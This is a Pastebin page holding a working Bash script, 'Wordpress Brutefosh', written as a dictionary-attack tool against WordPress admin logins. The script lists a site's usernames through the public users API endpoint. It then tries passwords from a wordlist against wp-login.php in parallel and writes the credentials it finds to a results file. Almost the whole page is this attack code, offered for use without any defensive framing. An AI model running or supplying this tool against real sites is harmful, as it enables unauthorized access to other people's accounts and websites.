SHARE
TWEET

[BASH] Wordpress Brutefosh 1.0

zerobyte-id Mar 28th, 2019 (edited) 568 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Name       : Wordpress Brutefosh
  3. # Version    : 1.2
  4. # Desc.      : Dictionary Attack Tool - Wordpress Admin
  5. # Coded by   : Schopath
  6. # Website    : www.zerobyte.id
  7. # Updated on : 2019-03-28
  8.  
  9. #----------- CONFIGURATION -----------
  10. curl_timeout=20
  11. multithread_limit=10
  12. #--------- CONFIGURATION EOF ---------
  13.  
  14. if [[ -f wpusername.tmp ]]
  15. then
  16.     rm wpusername.tmp
  17. fi
  18. RED='\e[31m'
  19. GRN='\e[32m'
  20. YEL='\e[33m'
  21. CLR='\e[0m'
  22.  
  23. function _GetUserWPJSON() {
  24.     Target="${1}";
  25.     UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
  26.     echo ""
  27.     if [[ -z ${UsernameLists} ]];
  28.     then
  29.         echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
  30.     else
  31.         echo -ne > wpusername.tmp
  32.         for Username in ${UsernameLists};
  33.         do
  34.             echo "INFO: Found username \"${Username}\"..."
  35.             echo "${Username}" >> wpusername.tmp
  36.         done
  37.     fi
  38. }
  39.  
  40. function _TestLogin() {
  41.     Target="${1}"
  42.     Username="${2}"
  43.     Password="${3}"
  44.     LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
  45.     if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];
  46.     then
  47.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  48.     elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];
  49.     then
  50.         echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
  51.         echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
  52.     else
  53.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  54.     fi
  55. }
  56.  
  57. echo ' _    _               _                         '
  58. echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '
  59. echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'
  60. echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'
  61. echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'
  62. echo '                       |_|.::Brutefo(sh) 2019::.'
  63. echo ''
  64.  
  65. echo -ne "[?] Input website target : "
  66. read Target
  67.  
  68. curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
  69. if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];
  70. then
  71.     echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
  72.     exit
  73. fi
  74.  
  75. echo -ne "[?] Input password lists in (file) : "
  76. read PasswordLists
  77.  
  78. if [[ ! -f ${PasswordLists} ]]
  79. then
  80.     echo -e "${RED}ERROR: Wordlists not found!${CLR}"
  81.     exit
  82. fi
  83.  
  84. _GetUserWPJSON ${Target}
  85.  
  86. if [[ -f wpusername.tmp ]]
  87. then
  88.     for User in $(cat wpusername.tmp)
  89.     do
  90.         (
  91.             for Pass in $(cat ${PasswordLists})
  92.             do
  93.                 ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  94.                 _TestLogin ${Target} ${User} ${Pass} &
  95.             done
  96.             wait
  97.         )
  98.     done
  99. else
  100.     echo -e "${YEL}INFO: Cannot find username${CLR}"
  101.     echo -ne "[?] Input username manually : "
  102.     read User
  103.  
  104.     if [[ -z ${PasswordLists} ]]
  105.     then
  106.         echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
  107.         exit
  108.     fi
  109.     echo ''
  110.     (
  111.         for Pass in $(cat ${PasswordLists})
  112.         do
  113.             ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  114.             _TestLogin ${Target} ${User} ${Pass} &
  115.         done
  116.         wait
  117.     )
  118. fi
  119. echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top